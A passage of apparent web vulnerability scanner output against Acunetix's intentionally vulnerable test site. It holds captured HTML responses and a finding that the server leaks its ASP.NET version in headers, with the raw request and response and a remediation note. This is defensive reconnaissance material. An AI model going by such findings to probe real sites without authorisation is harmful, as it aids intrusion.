cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 22752Response body (22752 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 